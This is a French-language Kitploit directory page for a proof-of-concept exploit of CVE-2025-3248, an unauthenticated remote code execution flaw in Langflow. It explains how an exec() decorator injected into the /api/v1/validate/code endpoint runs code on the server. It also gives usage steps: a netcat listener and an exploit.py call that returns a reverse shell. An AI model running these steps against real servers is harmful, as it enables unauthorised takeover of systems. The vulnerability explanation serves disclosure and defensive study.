Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/hideki233/cve-2025-3248-langflow-rce
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubhideki233/cve-2025-3248-langflow-rce

CVE-2025-3248-Langflow-RCE

Preuve de concept pour CVE-2025-3248, une vulnérabilité d'exécution de code à distance non authentifiée dans Langflow, démontrant une injection de code via le point de terminaison /api/v1/validate/code.

Voir le dépôt
il y a 16h 24mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-3248 — Exécution de code à distance non authentifiée dans Langflow

Preuve de concept d'exploitation pour CVE-2025-3248, une vulnérabilité d'exécution de code à distance non authentifiée dans Langflow, une plateforme de création de flux de travail pour l'IA et les LLM.

  • Versions concernées : Langflow < 1.3.0
  • Corrigé dans : 1.3.0
  • Classe de vulnérabilité : RCE non authentifiée (CWE-94, injection de code)
  • Statut : Ajouté au catalogue des vulnérabilités connues et exploitées de la CISA après avoir été observé exploité dans la nature par des botnets.

Cause racine

Langflow expose un point de terminaison, POST /api/v1/validate/code, destiné à « valider » un extrait de code Python soumis par l'interface utilisateur (par exemple, le code de composants personnalisés). En interne, il analyse et compile le code avec ast.parse() / compile() et renvoie si le code est valide — sans aucune authentification requise.

Le bug : Python évalue les expressions de décorateur au moment de l'analyse/compilation, avant même que la fonction décorée ne soit appelée. Si le « code à valider » soumis contient un décorateur comme :

root@kitploit:~
@exec("...code malveillant...")
def test():
    pass

l'appel exec(...) s'exécute dès que le code est analysé — la validation n'a jamais besoin d'invoquer réellement test(). Combiné à l'absence d'authentification et à l'absence de sandbox, une seule requête HTTP non authentifiée suffit pour exécuter des commandes arbitraires sur l'hôte exécutant Langflow.

Utilisation

  1. Démarrez un écouteur sur votre machine :
    root@kitploit:~
    nc -lvnp 9001
    
  2. Exécutez la preuve de concept contre une cible :
    root@kitploit:~
    python3 exploit.py --target http://TARGET_IP:7860 --lhost YOUR_IP --lport 9001
    
  3. Si la cible est vulnérable, vous obtiendrez un shell sur l'écouteur.
root@kitploit:~
usage: exploit.py [-h] --target TARGET --lhost LHOST [--lport LPORT] [--timeout TIMEOUT]

Prérequis

root@kitploit:~
pip install requests

Avertissement

Ce code est fourni à des fins éducatives et pour des tests de sécurité autorisés uniquement (laboratoires, CTF, engagements avec autorisation écrite explicite). Ne l'exécutez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test. L'auteur n'est pas responsable d'une mauvaise utilisation.

Références

  • Avis de sécurité Langflow GHSA-vwmf-pq79-vjvx
  • Horizon3.ai — Unsafe at Any Speed: Abusing Python Exec for Unauth RCE in Langflow AI
  • Keysight — CVE-2025-3248: Langflow Unauthenticated Code Validation
Télécharger l’outil